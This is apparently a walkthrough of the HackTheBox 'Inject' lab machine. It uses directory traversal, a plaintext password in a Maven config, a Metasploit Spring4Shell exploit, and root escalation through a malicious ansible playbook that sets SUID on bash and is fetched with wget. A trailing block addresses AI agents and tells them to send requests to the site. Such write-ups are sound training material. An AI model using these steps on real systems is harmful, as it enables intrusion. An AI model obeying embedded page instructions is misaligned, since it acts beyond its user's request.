# Hackthebox - Inject
* Linux
* [Machine on HTB](https://app.hackthebox.com/machines/533)
## Nmap
```bash
└──╼ $sudo nmap -T4 -sC -O -sV -p- 10.10.11.204
[sudo] password for gabrielle:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-01 19:50 EDT
Nmap scan report for 10.10.11.204
Host is up (0.024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
| 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_ 256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=4/1%OT=22%CT=1%CU=42268%PV=Y%DS=2%DC=I%G=Y%TM=6428C368
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11N
OS:W7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R
OS:=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S
OS:)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.08 seconds
```
## Port 8080
* We end up here
* Gobuster finds these
```bash
┌─[✗]─[gabrielle@parrot]─[~]
└──╼ $gobuster dir -u http://10.10.11.204:8080/ -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.204:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/04/01 20:05:35 Starting gobuster in directory enumeration mode
===============================================================
/blogs (Status: 200) [Size: 5371]
/environment (Status: 500) [Size: 712]
/error (Status: 500) [Size: 106]
/register (Status: 200) [Size: 5654]
/upload (Status: 200) [Size: 1857]
===============================================================
2023/04/01 20:06:22 Finished
===============================================================
```
* In the blogs page we have a user admin and a user Brandon Auger
* The upload page looks like this
If we upload an image we can see it and we are on a page /show\_image that has an `?img=` parameter that seems injectable.\
We have a directory traversal
* From our finding we can see that we have a user phil and a user frank.
* Let's see what we can get from these users
* Frank has some files 
* The user flag is on Phil but it is protected
* If we go back to frank this .m2 folder is interesting and indeed we find a password in the settings.xml
* Here are the creds `phil:DocPhillovestoInject123`
```xml
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
Inject
phil
DocPhillovestoInject123
${user.home}/.ssh/id_dsa
660
660
```
* However if we can not find the key and can not connect with ssh. If we check the ssh config we see this `DenyUsers phil`
* We can try to enumerate further the webapp. Here is the pom.xml file that might be worth a look
```xml
4.0.0
org.springframework.boot
spring-boot-starter-parent
2.6.5
com.example
WebApp
0.0.1-SNAPSHOT
WebApp
Demo project for Spring Boot
11
com.sun.activation
javax.activation
1.2.0
org.springframework.boot
spring-boot-starter-thymeleaf
org.springframework.boot
spring-boot-starter-web
org.springframework.boot
spring-boot-devtools
runtime
true
org.springframework.cloud
spring-cloud-function-web
3.2.2
org.springframework.boot
spring-boot-starter-test
test
org.webjars
bootstrap
5.1.3
org.webjars
webjars-locator-core
org.springframework.boot
spring-boot-maven-plugin
${parent.version}
spring-webapp
```
## Get a shell
If we google the items from the pom.xl we can see that it seems to be vulnerable to spring4shell, after a try of a few different exploit the one that workd was this one on Metasploit `multi/http/spring_cloud_function_spel_injection`
* `set RHOSTS 10.10.11.204`
* `set LHOST tun0`
* Then we just need to `run`
* And we get a shell as frank
## Move to Phil
* We can use the password we found previously to move to phil `su phil` it works
Now we can get the user flag
* Let's also run `python3 -c 'import pty;pty.spawn("/bin/bash")'` and `export TERM=screen` to have a better shell
## Privilege escalation
* suid are not really interesting here
* however phil belongs to the group [staff](https://raspberrypi.stackexchange.com/questions/67670/what-is-the-purpose-of-group-staff) that gives permission without having to be root.
```txt
staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may "override" the executables in /bin and /usr/bin with the same name). Compare with group "adm", which is more related to monitoring/security.
```
find / -user staff -print 2>/dev/null
/home/phil/.bash\_history -rw-r--r-- 1 root root 832 Feb 2 2020 /usr/share/bash-completion/completions/bind /usr/lib/python3/dist-packages/ansible\_collections/community/windows/tests/integration/targets/win\_xml/files/config.xml /usr/lib/python3/dist-packages/ansible\_collections/junipernetworks/junos/tests/integration/targets/junos\_config/templates/basic/config.xml -rw-r--r-- 1 root root 2928 Mar 22 2020 /usr/share/bleachbit/cleaners/filezilla.xml /usr/share/openssh/sshd\_config usr/lib/python3/dist-packages/ansible\_collections/community/postgresql/tests/integration/targets/setup\_postgresql\_db/files/pg\_hba.conf Sudo version 1.8.31 /usr/share/openssh/sshd\_config
* We get creds here `cat /usr/lib/python3/dist-packages/ansible_collections/cisco/dnac/playbooks/credentials.yml`
```txt
dnac_host: 192.168.196.2
dnac_port: 443
dnac_username: admin
dnac_password: Maglev123
dnac_version: 2.2.3.3
dnac_verify: False
```
* I decided to run pspy and found these lines
```bash
2023/04/16 01:32:03 CMD: UID=0 PID=7000 | /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1681608722.5781634-6981-17158073250937/AnsiballZ_setup.py
2023/04/16 01:32:03 CMD: UID=0 PID=6999 | /bin/sh -c /usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1681608722.5781634-6981-17158073250937/AnsiballZ_setup.py && sleep 0
2023/04/16 01:32:03 CMD: UID=0 PID=6998 | /bin/sh -c /bin/sh -c '/usr/bin/python3 /root/.ansible/tmp/ansible-tmp-1681608722.5781634-6981-17158073250937/AnsiballZ_setup.py && sleep 0'
2023/04/16 01:32:03 CMD: UID=0 PID=6981 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
2023/04/16 01:32:03 CMD: UID=0 PID=6975 | /usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
2023/04/16 01:32:03 CMD: UID=0 PID=6974 | sleep 10
2023/04/16 01:32:03 CMD: UID=0 PID=6973 | /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
2023/04/16 01:32:03 CMD: UID=0 PID=6972 | /usr/bin/python3 /usr/local/bin/ansible-parallel /opt/automation/tasks/playbook_1.yml
```
* We have write rights on the task folder.
* Looking up ansible we can see [this](https://rioasmara.com/2022/03/21/ansible-playbook-weaponization/) interesting article that can allow us to escalate.
* We create this yaml file in our kali machine
```yml
- name: "whatever"
hosts: localhost
connection: local
tasks:
- name: "whatever"
shell: "chmod +s /bin/bash"
register: "output"
```
* This will put the suid bit on bash and we will then be able to exploit this with [this](https://gtfobins.github.io/gtfobins/bash/)
* From our target we go to the tasks folder `cd /opt/automation/tasks`
* We launch a python3 server from our attack machine
* This way we can get the file in our target `wget http://10.10.14.5/playbook_1.yml`
* The file has to be named `playbook_1.yml`
* We can rename the initial file `playbook_1.yml.old` and get the new one after.
* After a little while if we run `/bin/bash -p` we should be root
* We can grab the final flag
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://csbygb.gitbook.io/pentips/writeups/htbwriteups/htb-inject.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.